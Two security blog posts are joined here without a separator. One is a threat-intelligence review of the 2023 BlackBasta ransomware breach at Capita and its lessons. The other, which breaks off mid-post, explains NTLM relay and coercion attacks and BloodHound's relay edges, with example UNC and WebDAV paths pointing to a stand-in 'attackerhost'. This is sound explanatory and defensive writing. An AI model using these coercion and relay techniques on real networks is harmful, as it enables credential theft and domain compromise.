IntroductionWhen a company that manages data for millions of UK citizens falls victim to ransomware, the whole industry should pay attention to it. On 15 October 2025, the UK Information Commissioner’s Office (ICO) published a detailed 136 page report about the Capita breach. The aim of this blog is to extract actionable cybersecurity lessons from the ICO’s findings as well as open source reports surrounding the breach from a cyber threat intelligence (CTI) analyst’s perspective to help SOC and
When a company that manages data for millions of UK citizens falls victim to ransomware, the whole industry should pay attention to it. On 15 October 2025, the UK Information Commissioner’s Office (ICO) published a detailed 136 page report about the Capita breach.
The aim of this blog is to extract actionable cybersecurity lessons from the ICO’s findings as well as open source reports surrounding the breach from a cyber threat intelligence (CTI) analyst’s perspective to help SOC and CERT teams, and CISOs understand what happened and how to avoid the mistakes made by others.
BLUF Incident Impact Summary:
Capita was attacked by BlackBasta ransomware in March 2023
Over six million individual’s records were exfiltrated from Capita’s systems
A £14 million fine was issued to Capita by the ICO
Capita said in May 2023, the incident cost up to £20 million to recover
Important context about Capita
The Capita Group is a business process outsourcing (BPO) and professional services group employing approximately 34,500 people worldwide and with a reported annual revenue of £2,421.6 million. For readers outside of Great Britain, Capita is best known as the UK’s go-to managed service provider for large-scale, data-sensitive public sector operations.
Companies within the Capita Group act as data processors for a range of business services to both public and private sector organisations. Capita plc is the ultimate parent company of a large corporate group consisting of multiple legal entities.
Capita has long been one of the UK government’s biggest suppliers of outsourced services.
They manage (or have managed):
The BBC TV Licensing system
The UK Congestion Charge for Transport for London (TfL)
The National Pupil Database – via contracts with the Department for Education.
Electronic tagging of offenders – under contracts with the Ministry of Justice.
Council administration and call-centre services – many local authorities (e.g., Birmingham, Southampton, Sheffield)
Numerous Local Government and private sector pension schemes (including universities, utilities, and insurance companies).
Ministry of Defence (MOD) – Training and support contracts for the British Army’s Recruitment Partnership Project (including vetting systems) and Royal Navy training programmes.
The ICO established that during the Incident, data was exfiltrated from two legal entities which were acting as data controllers, and from four legal entities which were acting as data processors:
Capita plc - Capita plc’s focus includes Central Government, Local Public Service, Defence, Education, and Pensions. Capita was selected to administer the UK’s Civil Service Pension Scheme (CSPS) from September 2025, via a contract worth £239m over 10 years.
Capita Resourcing Limited - is a subsidiary of Capita plc focused on resourcing/human-capital services, i.e., recruitment, contingent staffing, talent acquisition.
Capita Business Services Limited - is another subsidiary that provides business-process and digital services (as a part of the Capita outsourcing ecosystem). The supplier record shows over £331.9m recorded government spending linked to this entity.
Capita Pension Solutions Ltd (CPSL) - a regulated pensions business within the Capita Group. Its role: delivering pensions administration and consulting services for pension schemes, including defined benefit schemes.
Breach Timeline
In the ICO’s report, a timeline of events that led to data exfiltration and ransomware deployment was provided. The timeline diagram below helps illustrate what happened.
TheRecord also reported that Capita’s share price dropped more than 12% from a high of £38.64 ($47.97) on March 30, the day before the incident was first reported, to £33.72 ($42.58) on Wednesday morning.
On 3 April 2023, Capita released a public statement about the cyber incident. At the time, Capita said the “issue was limited to parts of the Capita network and there is no evidence of customer, supplier or colleague data having been compromised.”
On 8 April 2023, Brett Callow spotted that Capita had been listed on BlackBasta’s Tor data leak site before it was quickly removed that same day.
Security researcher Kevin Beaumont who analysed the leaked data samples at the time identified copies of stolen passport scans, PII records, bank account details, internal floor plans of multiple buildings from various schools as well as Capita Nuclear, part of Capita Business Services.
It took Capita until 20 April 2023 to confirm that some of its systems were in fact breached and that data had been stolen.
Types of Stolen Data
In the ICO’s report, we learn that 6,024,221 data subjects for whom Capita was the data processor had personal data exfiltrated, as determined by Capita’s forensic provider.
Types of data stolen included sensitive such as Home Address, Email, Phone Number, National Insurance Numbers, Driver’s License Scans, Passport Scans, Bank Account Numbers & Sort Codes, Credit Card Numbers, Biometrics, Criminal Record Checks, and Employee Login details.
BlackBasta Operator TTPs
The tactics, techniques, and procedures (TTPs) of the BlackBasta operators provided in the breach timeline by the ICO are useful for understanding what technical steps were involved that led to the breach and ransomware attack. A summary of the aspects of the attack have been mapped to a diamond model diagram below.
Outside of the breach timeline, some additional technical details were shared:
Following initial access, the Threat Actor accessed the ‘CAPITA\backupadmin’ service account approximately 4.5 hours later. Capita could not confirm how the Threat Actor was able to escalate their privileges; however, there were traces of Kerberos credential harvesting and reconnaissance activity found following the Incident.
The Threat Actor was able to use the ‘CAPITA\backupadmin’ domain administrator account to pivot to administrator accounts in different Capita domains. In total no fewer than 8 domains were compromised, a very large quantity of data was exfiltrated and the Threat Actor attempted to deploy ransomware on at least 1057 hosts.
Even though Capita quarantined the device through which the Threat Actor first gained access on 24 March 2023, by this time the Threat Actor had deployed software into the network which had enabled them to establish persistence and ultimately allowed them to continue moving laterally across the network into different Capita domains and to access/exfiltrate data, before deploying ransomware on 31 March 2023.
Interestingly, in February 2025 internal chat logs from the BlackBasta gang were leaked publicly online. Analysis of the leaked chat logs for references of Capita revealed the below command shared by one of the BlackBasta members months after the attack happened:
The domain "corpcitrix.ad.capita.co.uk" appears to be an internal Active Directory domain name used by Capita to host its corporate Citrix environment. The "ad" label shows it’s an AD DNS namespace, "corpcitrix" indicates the environment is for Citrix-published desktops/apps or related infrastructure, and "capita.co.uk" is the organisation’s FQDN.
The command shown above is a PowerShell invocation (potentially via Cobalt Strike) to enumerate every system in the domain, resolve each machine’s IP address, and save the results to “SFS_pc.txt” file. Powerpick runs the code in an unmanaged PowerShell environment and can execute without being dependent on powershell.exe.
In short, this command shows a BlackBasta operator running net reconnaissance mapping hosts and IPs (likely to plan lateral movement, targeting, exfiltration or ransomware deployment).
Notable moments during the Incident
Critical alerts were mishandled or deprioritised: The initial malicious file (‘jdmb.js’) triggered a P2 (High) alert at 08:00 on 22 March 2023, indicating compromise. The SOC did not act for nearly 58 hours, despite automatic escalation warnings for missed service-level agreements (SLAs). The ICO also noted that “at no point in the six months before or after the Incident did Capita meet their SLA for any alert level.”
Excessive delay between detection and containment, plus a lack of automation: Isolation of the device from the rest of the Capita network still required human intervention, which took 58 hours to arrive. Capita’s SOC lacked the ability to isolate the device automatically. By then, the attacker had already gained domain admin access and moved laterally.
Inadequate incident response procedures: Capita did not invoke its Major Incident Management process until 09:22 on 29 March 2023, which was seven days after compromise. By that point, data exfiltration was already underway and it was two days before ransomware was deployed on 31 March 2023.
Understaffed and overburdened SOC team: Capita is understood to have had 1 SOC analyst per shift in place at the time of the Incident in March 2023. This combined with historic underperformance indicates systemic issues within the SOC, including inadequate staffing, insufficient training, and/or inefficient processes.
Lessons Learned from the BlackBasta Ransomware Attack on Capita
Having tools isn’t enough, they must be configured, integrated, and monitored effectively
Capita had Trellix EDR, a SIEM, and a SOC, but alerts were missed and containment delayed.
Lessons: Security tools are only as effective as the people, processes, and automation supporting them. Critical security alerts must have clear, measurable response times with automatic escalation if breached. Security Leadership must define and enforce strong Service Level Agreements (SLAs) for incident response.
Implement proper Active Directory (AD) tiering
Lack of AD tiering allowed attackers to move laterally from low-privilege systems to domain controllers (specifically a backup service account with domain admin privileges).
Lessons: Segregate admin privileges between tiers (workstations, servers, domain controllers) to contain breaches. Limit, rotate, and monitor privileged accounts using a PAM solution to enforce least privilege. Regularly review service accounts, ensure unique credentials, and monitor their activity for anomalies.
Act on penetration test findings promptly
Multiple pentests also warned of AD and privilege issues months before the breach, but fixes were delayed.
Lesson: Treat pentest reports as actionable tasks with deadlines and executive oversight.
Automate incident response where possible (SOAR)
Lack of Security Orchestration, Automation and Response (SOAR) led to manual triage delays.
Lesson: Use SOAR playbooks to automate containment, escalation, and alert enrichment for faster response.
NTLM relay attacks have been around for a long time. While many security practitioners think NTLM relay is a solved problem, or at least a not-so-severe one, it is, in fact, alive and kicking and arguably worse than ever before. Relay attacks are the easiest way to compromise domain-joined hosts nowadays, paving a path for lateral movement and privilege escalation.NTLM relay attacks are more complicated than many people realize. There are a lot of moving parts that operators have to track using
NTLM relay attacks have been around for a long time. While many security practitioners think NTLM relay is a solved problem, or at least a not-so-severe one, it is, in fact, alive and kicking and arguably worse than ever before. Relay attacks are the easiest way to compromise domain-joined hosts nowadays, paving a path for lateral movement and privilege escalation.
NTLM relay attacks are more complicated than many people realize. There are a lot of moving parts that operators have to track using different tools, but we have recently introduced NTLM relay edges into BloodHound to help you keep on thinking in graphs with new edges that represent coercion and relay attacks against domain-joined computers, originating from Authenticated Users and leading into the computer that could be compromised via SMB, LDAP/LDAPS, and ADCS ESC8. Each of these edges is composed of different components and prerequisites, but they all follow the same “Zero to Hero” pattern from Authenticated Users to the would-be compromised computer.
While there are many great resources on this old attack, I wanted to consolidate everything you need to know about NTLM into a single post, allowing it to be as long as needed, and I hope everyone will be able to learn something new.
Once Upon a Time
NTLM is a legacy authentication protocol that Microsoft introduced in 1993 as the successor to LAN Manager. NTLM literally stands for New Technology LAN Manager, a name that didn’t age well. While Kerberos is the preferred authentication protocol in Active Directory environments (and beyond), NTLM is still widely used whenever Kerberos isn’t viable or, more commonly, when NTLM usage is hard-coded.
NTLM Fundamentals
My favorite research area is authentication protocols, and over the years, I’ve noticed that every authentication protocol is designed to thwart one or two primary threats. For NTLM, I believe it is replay attacks. Not relay attacks (obviously, given the title), but replay attacks, where an attacker intercepts a valid authentication exchange and replays the packets/messages later to impersonate the victim. NTLM prevents such attacks using a challenge-response exchange: the server generates a random challenge, and the client produces a cryptographic response that proves possession of the client’s credentials.
The NTLM authentication exchange involves a three-message exchange:
The Negotiate (type 1) message is sent from the client to the server to initiate authentication and negotiate session capabilities, such as a session key exchange and signing (more on those later), through a set of flags indicating the client’s supported/preferred security attributes for the session.
The Challenge (type 2) message is sent from the server to the client. It contains a corresponding set of flags indicating the server’s supported/preferred session capabilities and an 8-byte randomly generated nonce, known as the server challenge.
The Authenticate (type 3) message is sent from the client to the server. It contains a set of flags indicating the determined session capabilities based on the client’s and server’s preferences and a cryptographically generated response to the server challenge. There are two major NTLM response generation algorithm versions: NTLMv1 and NTLMv2.
The server then validates the response to authenticate the client. Local accounts are validated against the NT hashes stored in the local SAM, and domain accounts are sent to a domain controller for validation via the Netlogon protocol.
NTLMv1
NTLMv1 is the original response algorithm. It was developed in 1993, in the unfortunate days when DES was the standard encryption algorithm, so that’s what Microsoft used to generate the response, as described in the diagram below:
As shown above, the client’s password is transformed into an NT hash, which is the MD4 hash of the Unicode-encoded password, to be used as the DES encryption key. However, there was a little hiccup: the NT hash was 16 bytes, while the effective DES key length was 7 bytes. Microsoft came up with a creative solution — split the NT hash into three keys: the first seven bytes, the following seven bytes, and the last two bytes padded with zeros. Each of these keys encrypts the server challenge three times independently, and the ciphertexts are concatenated to produce a 24-byte-long response.
NTLMv1 is Bad
NTLMv1 turned out to be a bad idea for three main reasons:
First, DES encryption is… not great, as it can be cracked relatively easily.
Second, the response isn’t “salted”, meaning that the same password and server-challenge combination always produces the same response, making it susceptible to rainbow table attacks.
Third, combining the two previous reasons makes one of my all-time favorite attacks, discovered by Moxie Marlinspike and David Hulton. They managed to recover the raw NT hash by cracking each of the three ciphertexts individually, using rainbow tables and custom hardware. Why should we care about the NT hash? After all, it’s not a password, right? We’ll discuss the infamous Pass the Hash attack soon.
“NTLM2” Precedes NTLMv2
Just for completeness, I’ll mention “NTLM2”, also known as “NTLM2 Session Response” or “NTLMv1 with Enhanced Session Security”. This interim version between NTLMv1 and NTLMv2 introduced an 8-byte client-generated nonce, known as the client challenge. The client challenge was concatenated with the server challenge, and then the combined value was MD5-hashed and, finally, DES-encrypted as in NTLMv1. This enhancement ensured every response was unique and thwarted rainbow table attacks. However, the algorithm is still fundamentally flawed, and the NT hash can be recovered with modern GPUs within less than 24 hours, on average, at a cost of about $30.
NTLM2 is just a distraction, though. Feel free to forget you ever read the paragraph above.
NTLMv2
Shortly after, still in the ’90s, Microsoft released NTLMv2, replacing DES encryption with HMAC-MD5, as described below. This algorithm is still in use today.
The NT hash is used as the key to generate an HMAC of the client’s domain name and username. It is called the “NT One Way Function v2” or NTOWFv2. The NTOWFv2 HMAC value is then used as the key to generate another HMAC, this time of the server challenge, along with additional information, such as a random client challenge and a timestamp to thwart rainbow table attacks, and additional session attributes, which we will discuss later. This HMAC value is the NT Proof String or NTProofStr. Many people mistakenly think that the NTProofStr is the NTLMv2 response, but it is only part of it. All the additional information used to generate the NTProofStr is also included in the NTLMv2 response to allow the server to generate the same HMAC and validate the client’s response.
LM Compatibility Level
Every Windows host acts as both a server, when someone authenticates to it, and a client, when it authenticates to another host. A single registry value controls both the server and client NTLM version support, located at HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel. It allows enabling/disabling NTLMv1 and NTLMv2 for the entire host as a server and as a client, as described in the table below:
When a client authenticates to a member server using a domain account, the server sends the response to a DC for validation. Therefore, the DC’s LmCompatibilityLevel is the one that determines whether NTLMv1 is accepted or not. Note that different DCs can technically have different configurations. However, it is very uncommon to see DCs with LmCompatibilityLevel set to 5 (I’ve never seen that outside of lab environments), so it’s safe to assume the DC will support both NTLMv1 and NTLMv2, as a server, for domain accounts.
It is not uncommon to see DCs with a lower LmCompatibilityLevel. I believe the reason is that some sysadmins mistakenly think that a lower LmCompatibilityLevel is required to support NTLMv1 clients in the domain, while, in fact, they just enable NTLMv1 on the DCs as clients, which can have dire consequences, as we will explain soon.
Looking at the table above, we can make a few observations:
As a client, a Windows host can have either NTLMv1 or NTLMv2 enabled but not both.
As a server, a Windows host will likely enable both NTLMv1 and NTLMv2.
If a Windows host enables NTLMv1 as a client, it must also enable it as a server.
A Windows host doesn’t have to enable NTLMv1 as a client to enable it as a server.
Additional settings allow restricting or auditing outgoing or incoming NTLM authentication or requiring session security settings, but we won’t elaborate on those.
Password Cracking is a Problem
There are different tools for capturing NTLM responses for cracking. Responder is the most well-known and widely used tool, but Inveigh and Farmer deserve an honorable mention, too.
An attacker can potentially crack a captured NTLM exchange, whether it’s NTLMv1 or NTLMv2, to recover the password if it is not sufficiently strong. In the case of NTLMv1, the NT hash can always be recovered, and it can be abused in a couple of ways. If it is a computer/service account, the attacker can forge an RC4-encrypted Kerberos silver ticket and impersonate a privileged account to the host or the service. The NT hash can also be used for NTLM authentication, without cracking the cleartext password, through the infamous Pass the Hash attack.
Pass the Hash
When taking a closer look at the NTLMv1 and NTLMv2 flows, you may notice that, technically, we don’t need the cleartext password to produce a valid NTLM response. If we skip the first step in the flow, the NT hash is all we need.
Who Needs to Crack Passwords Anyway?
The real problem with NTLM is relay attacks. An attacker can simply relay the NTLM messages between a client and server, back and forth, until the server establishes a session for the client, allowing the attacker to perform any operation the client could perform on the server. For clarity, we will refer to the client as the “victim” and the server as the “target”.
Relay attacks allow authenticating as the victim to the target without spending time and resources on password cracking and without depending on weak passwords.
Not an Opportunistic Attack
Some defenders belittle relay attacks because they seem to be somewhat opportunistic. However, relay attacks can be executed with intention and precision when combined with authentication coercion attacks.
Generally, the mechanics of computer account authentication coercion and user account authentication coercion are different.
Computer Account Authentication Coercion
Computer account authentication coercion typically involves an RPC call to a vulnerable function on a remote host (the relay victim). Specifically, we’d try to call a function that would attempt to access an arbitrary path we can control. Then, when the remote service attempts to access the specified path, we’d require authentication and kick off a relay attack. The remote service would authenticate as the relay victim computer account if the service runs as SYSTEM or NETWORK SERVICE and if it doesn’t impersonate a different context before attempting to access the resource.
The two most notable computer authentication coercion primitives are the Printer Bug and PetitPotam. The Printer Bug abuses the function RpcRemoteFindFirstPrinterChangeNotification[Ex] in the Print Spooler service, which establishes a connection to an arbitrary path to send notifications about print object status changes. PetitPotam abuses several functions in the Encrypting File System (EFS) service, such as EfsRpcOpenFileRaw, which opens a file in an arbitrary path for backup/restore. These techniques result in an immediate authentication attempt from the victim computer account without user interaction.
Authenticated Users are permitted to trigger these computer account authentication coercion attack primitives, allowing almost anyone to initiate the relay attack.
User Account Authentication Coercion
User account authentication coercion is more complicated and, in some cases, somewhat opportunistic. The classic user account authentication coercion primitives involve planting a reference to an external resource in a document, email, or even a web page. When the victim renders the document, the client attempts to load the resource, sometimes without their knowledge or consent, and initiates an authentication attempt with the user’s credentials. These primitives require one to three clicks and can be sent directly to the victim or strategically planted in a high-traffic shared folder or website for a watering hole attack.
Dominic Chell highlighted a more sophisticated, well-known approach that abuses Windows Shell. Windows Shell is the operating system’s user interface. It has extensions and handlers that enrich the user experience, for example, by generating thumbnails/previews or customizing icons. Specially crafted files can manipulate these mechanisms to access arbitrary paths as soon as the operating system “sees” them, without any user interaction. The most common way to abuse it is to pass to the icon handler a reference to an attacker-controlled path, which would result in a user authentication attempt as soon as the user browses the folder in which the file is located, even if the user doesn’t even click or highlight the file. The most notable file types that support this kind of manipulation are:
Windows Search Connectors (.searchConnector-ms)
URL files (.url)
Windows Shortcuts (.lnk)
Windows Library Files (.library-ms)
For example, the following URL file would try to load its icon from the path \\attackerhost\icons\url.icon from the user’s security context, so it authenticates with the user’s credentials.
Attackers can drop these files in strategic file shares, such as high-traffic file shares or those frequently used by privileged users, and then kick off a relay attack as soon as an authentication attempt comes through.
Credential Abuse Without Lateral Movement
Traditionally, when attackers gain admin access to a host with an interesting logged-on user, they would move laterally to that host and then attempt one of many credential abuse techniques to impersonate the user and continue maneuvering toward their objectives. However, as EDRs and other endpoint security solutions improve, the detection risk of lateral movement and credential abuse TTPs increases.
Instead, attackers can reduce the detection risk by accessing the remote file system via an administrative share, such as C$, and dropping an authentication coercion file on the logged-on user’s desktop. The moment the file is dropped, Windows Shell starts processing it, and an authentication attempt to the attacker-controlled host is initiated. It works even if the file is hidden, the workstation is locked, or the RDP session is disconnected. More specifically, it works as long as explorer.exe runs in a suitable security context, meaning it is associated with a logon session with credentials cached in the MSV1_0 authentication package.
The attacker can try to crack the NTLM response to recover the password or establish a session on a target server by relaying it.
Taking Over 445
In case you missed it, it is possible to bind a listener to port 445 on Windows hosts without loading a driver, loading a module into LSASS, or requiring a reboot of the Windows machine, as Nick Powers discovered last year.
Too Good to Be True?
So far, NTLM relay attacks may seem very powerful and somewhat simple. However, over the years, Microsoft introduced several mitigations to complicate things.
Session Security
NTLM supports signing (integrity) and sealing (encryption/confidentiality) to secure the session. It is achieved by exchanging a session key in the NTLM Authenticate message. The client generates a session key and RC4-encrypts it using a key generated, in part, from the client’s NT hash. A common misunderstanding is that when signing is negotiated, NTLM relay attacks fail to establish a session (authenticate). However, even with signing, authentication is successful. The problem is that the attacker can’t recover the session key without possessing either the victim’s NT hash or the target’s credentials. But if the attacker possessed either of them, there would be no need for relaying anyway. Therefore, if the target indeed requires all the subsequent messages in the session to be signed with the session key, the attacker would not be able to use the session. Luckily for the attackers, not all servers implement such a requirement, as we will see soon.
The screenshot below shows a portion of a typical NTLM Authenticate message in which a session key is exchanged and signing is negotiated.
The premise of an NTLM relay attack is a man-in-the-middle position. Therefore, the attacker’s obvious next step should be tampering with this Authenticate message in flight to remove the session key and reset the Negotiate Key Exchange and Negotiate Sign flags, pretending the victim never negotiated those.
Message Integrity Code (MIC)
Microsoft anticipated such attempts and introduced an integrity check to the NTLM messages. An HMAC is added to the Authenticate message to protect all three NTLM messages with the session key. The server validates the MIC upon receiving the message, and if a single bit in any of the three NTLM messages is flipped, authentication fails.
Drop the MIC?
The MIC is a later addition to the NTLM protocol. Windows XP and Windows Server 2003 and older, as well as some 3rd party platforms, don’t support it. So, can’t the attacker drop the MIC and pretend the client never added it?
Microsoft anticipated that, too, and added an attribute to the NTLMv2 response indicating the MIC’s presence.
Therefore, an attacker would have to remove/reset that attribute before removing the MIC, but because this attribute is part of the NTLMv2 response, changing it would invalidate the NTProofStr, and authentication would fail.
Those of you who are paying attention should realize that NTLMv1 does not incorporate any additional information into the NTLMv1 response, meaning that NTLMv1 is always susceptible to MIC removal and tampering with the Negotiate flags and the session key.
A Blast From the Past
In 2019, Yaron Zinar and Marina Simakov discovered a couple of vulnerabilities in the NTLM implementation, allowing attackers to Drop the MIC even in NTLMv2. However, we will not delve into those because Microsoft released patches, and it is extremely rare to encounter Windows hosts affected by these vulnerabilities nowadays.
Channel Binding
Channel binding, also commonly referred to as Extended Protection for Authentication (EPA), is a mechanism that prevents man-in-the-middle attacks by incorporating a token from the secure channel (TLS), that is, the server certificate hash, into the NTLM Authenticate message. The server can compare the channel binding token to its own certificate hash and reject the authentication attempt if there is a mismatch. Any service running over TLS, such as HTTPS and LDAPS, can support channel binding.
Just like session security and the MIC, channel binding is not mandatory, but it is part of the NTLMv2 response, and therefore, it is protected by the NTProofStr, so the attacker can’t remove it and pretend it was never there. However, NTLMv1 does not support channel binding.
Backward Compatibility
All these mitigations are later additions to the protocol, so some older or 3rd party platforms may not support them. Therefore, they may not be required by the target server. The server behavior depends on its configuration, whether it is configured to support or even require session security or channel binding, and whether it is designed or implemented to honor the session capabilities negotiated in the NTLM exchange. Given that this is just about the midpoint of this post, you can assume it is not uncommon for targets not to require or enforce these mitigations.
Protected Users
Microsoft introduced the Protected Users security group in the Windows Server 2012R2 functional level to mitigate several attacks that can lead to credential material theft. Members of this group are not permitted to perform NTLM, and hosts running Windows Server 2012R2/Windows 8.1 or later do not cache the NT hash in LSA memory. These protections and others may have usability issues, so only privileged/sensitive accounts should be added to this group. Unfortunately, this group is too often left empty.
Not Too Good to Be True
Given everything discussed above, what are the conditions for relay attacks?
A relay attack should be viable if the target does not support these mitigations by design/implementation or configuration (disabled) or the target supports these mitigations (enabled) but does not require them, and one of the following applies:
The victim does not negotiate session security and channel binding
The victim’s session negotiation is unprotected (NTLMv1)
The target implementation ignores the negotiated capabilities
Relaying is only half the story, though. A successful relay satisfies authentication and establishes a session. However, authorization, meaning what the attacker can do afterward, depends on the victim’s permissions.
Targeting SMB
The first and simplest scenario we introduced into BloodHound is relaying NTLM to SMB. SMB servers don’t support channel binding with NTLM, and they negotiate signing at the SMB protocol level, outside the NTLM exchange, meaning that even if the victim negotiates signing in the NTLM Authenticate message, the target will disregard it and only consider what’s negotiated in the SMB headers, which the attacker can control. To be clear, configuring SMB clients to require SMB signing does not affect NTLM relay attacks.
Below is an excerpt from a typical SMB2 negotiate response message with SMB signing enabled but not required. The server is vulnerable to relay attacks if the signing required bit is not set.
Domain controllers starting with Windows Server 2008 and all Windows hosts starting with Windows Server 2025 and Windows 11 require SMB signing by default. In practice, it means that nowadays, most Windows hosts out there, especially Windows servers, don’t require SMB signing by default. Unfortunately, many organizations don’t change these defaults for the unjustified fear of backward compatibility or a myth about performance impact.
Introducing the CoerceAndRelayNTLMToSMB Edge
The new CoerceAndRelayNTLMToSMB edge is the simplest of the new NTLM relay edges. The edge always comes out of the Authenticated Users node and leads into the target computer node. It represents a combination of computer account authentication coercion against the relay victim and an NTLM relay attack against the relay target.
Collection
SharpHound collects all the required information as follows:
SMB signing status collection does not require authentication. It is collected from the relay target by actively establishing a connection with the host over SMB and parsing the SMB negotiation response messages.
Local admin rights are collected from the relay target. They can be collected from the host directly over RPC, which may or may not require admin rights, depending on the OS version and configuration, or from the DC via GPO analysis.
Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the edge if the following criteria are met:
SMB signing on the target computer is not required — this is the relay target. The edge will not be created if the SMB signing status is not collected/ingested into BloodHound.
At least one computer account in the environment has local admin access to the target computer — this is the relay victim.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
If the domain functional level is Windows Server 2012R2, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay target.
Expanding the Coercion Targets accordion lists the relay victims, and expanding the Composition view shows a visual representation.
Abuse
An attacker can traverse this edge to gain access to the C$ or ADMIN$ share on the relay target, dump LSA secrets from Remote Registry, including the computer account password, or move laterally via the Service Control Manager.
A very common scenario captured by this new edge is SCCM TAKEOVER 2, coercing authentication from the SCCM site server and relaying it to the SCCM database server to take over the entire hierarchy.
SMB-Specific Limitations
The CoerceAndRelayNTLMToSMB edge only covers scenarios in which a computer (victim) has admin access to another computer (target) that does not require SMB signing. It doesn’t cover user accounts as the relay victim, and it doesn’t cover access to resources that a relay victim might be able to access via SMB without admin rights, such as non-administrative file shares.
Other limitations that apply to all new NTLM relay edges will be discussed later.
Targeting ADCS (ESC8)
The new CoerceAndRelayNTLMToADCS edge is much more complicated than relaying to SMB because certificate abuse has a lot of requirements. However, the relaying logic is still relatively simple. Relaying to ADCS web enrollment allows obtaining a certificate for the relay victim and using it for authentication to impersonate the victim. This is the infamous ADCS ESC8 that Will Schroeder and Lee Chagolla-Christensen disclosed in their Certified Pre-Owned white paper.
The ADCS Certificate Authority Web Enrollment endpoint and Certificate Enrollment Web Service run on IIS. IIS does not support session security, but it does support Extended Protection for Authentication (EPA), also known as channel binding. EPA is supported over HTTPS, but not HTTP because HTTP has no secure channel to bind. So, if web enrollment is available over HTTP or over HTTPS with EPA disabled, then relay is viable. This is the default configuration on Windows Server 2022 and older, but no longer the default on Windows Server 2025. Note that it applies to any site served on IIS with NTLM authentication, not just ADCS web enrollment.
As mentioned, relaying is all about authentication. Once authenticated, the attacker can do whatever the relay victim is permitted to do. This attack is viable only if the relay victim is permitted to enroll a client authentication certificate (requires EKUs that allow performing Kerberos PKINIT authentication or Schannel authentication to LDAP) and the CA is trusted by the domain controller and added to the domain’s NTAuthCertificates. Jonas Bülow Knudsen explains these requirements in detail in this blog post.
Introducing the CoerceAndRelayNTLMToADCS Edge
The new CoerceAndRelayNTLMToADCS edge comes out of the Authenticated Users node and leads into the victim computer node, unlike CoerceAndRelayNTLMToSMB, which leads into the relay target computer node. The reason for the difference is that the attack compromises the relay victim rather than the relay target.
Collection
SharpHound collects all the required information as follows:
Connect to the ADCS enrollment endpoints and attempt to perform NTLM authentication with and without EPA to determine if it’s enabled, required, or disabled. This can be collected without admin access.
All the ADCS certificate enrollment requirements are collected via LDAP, as done for all existing ADCS edges. This can be collected without admin access.
Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the edge if the following criteria are met:
The relay victim is a computer permitted to enroll a certificate with a template that meets the requirements listed below. The relay victim must have the enroll permission on the enterprise CA and the certificate template.
The certificate template has (1) EKUs that enable PKINIT/Schannel authentication, (2) manager approval disabled, and (3) no authorized signatures required.
The enterprise CA is trusted for NT authentication, and its certificate chain is trusted by the domain controller.
The enterprise CA published the certificate template.
The enterprise CA that published the certificate has a web enrollment endpoint available over HTTP or HTTPS with EPA disabled.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
If the domain functional level is Windows Server 2012R2, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay victim.
Expanding the composition view shows all the components involved, including the certificate template and enterprise CA to target.
Abuse
After enrolling a certificate, the attacker can perform PKINIT authentication as the computer account using Rubeus to obtain a Kerberos Ticket Granting Ticket (TGT) and even the NT hash for the computer account through the UnPAC the Hash attack. With these, the attacker can compromise the relay victim host via S4U2Self abuse or a silver ticket, or use the TGT or the NT hash to access any resource that the computer account is permitted to access.
If the CA is susceptible to relay attacks, all the computers that can enroll a suitable certificate are exposed. Note that the default “Machine” certificate template meets the above criteria and exposes all the computers in the domain.
ADCS-Specific Limitations
The CoerceAndRelayNTLMToADCS edge only covers scenarios in which a computer (victim) can enroll a domain authentication certificate and the certificate authority web enrollment (target) that is vulnerable to relay attacks. It doesn’t cover user accounts as the relay victim, and it does not cover certificate templates incompatible with domain authentication.
Other limitations that apply to all new NTLM relay edges will be discussed later.
Targeting LDAP or LDAPS
The new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are by far more complicated to abuse. Unlike SMB and IIS, LDAP servers are implemented to require the capabilities negotiated with the client in the NTLM exchange, meaning that if the client negotiates session security with signing, the LDAP server will require all the subsequent messages in the session to be signed with the session key.
Computer account authentication coercion can trigger authentication from the SMB client, but the SMB client always negotiates session security with signing in the NTLM Authenticate message, so SMB can’t be relayed to LDAP. The exception to this rule is clients that have NTLMv1 enabled because, in NTLMv1, the MIC can be dropped, and the Negotiate Sign flag can be reset.
But that’s not a dead end. Some authentication coercion primitives, including the Printer Bug and PetitPotam, accept WebDAV paths simply by adding the at sign followed by a port number to the hostname, e.g., “\\attackerhost@80\icons\url.icon”.
WebDAV is encapsulated in HTTP messages sent by the Web Client service, which doesn’t negotiate signing and is, therefore, compatible with relaying to LDAP. However, by default, the Web Client would only authenticate to targets in the Intranet Zone, as per the default Internet Settings.
Getting in the (Intranet) Zone
HTTP clients in Windows should call the MapUrlToZoneEx2 function to determine which zone a given URL belongs to. The function determines that a URL maps to the Intranet Zone based on the following rules:
Direct Mapping: URLs manually added to the Intranet Zone
The PlainHostName Rule (aka “The Dot Rule”): If the URL’s hostname does not contain any dots
Fixed Proxy List Bypass: Sites added to the fixed proxy bypass list
WPAD Proxy Script: URLs for which the proxy script returns “DIRECT”
If you use the host’s “shortname” (the hostname portion of the FQDN, e.g., hostname.contoso.local) or NetBIOS name, the underlying name resolution mechanisms will resolve the name to an IP address, even though the URL is “dot-less”, because DNS automatically appends a suffix based on the client’s DNS search list, which is typically configured via DHCP or GPO.
But how can we get DNS resolution for our attacker-controlled host?
Bring Your Own DNS Record
By default, Active Directory Integrated DNS allows all Authenticated Users to create DNS records via LDAP or Dynamic DNS (DDNS), as discussed in this blog post by Kevin Robertson, and can be done with his tools Powermad and Sharpmad.
WebDAV Is a Hit or Miss
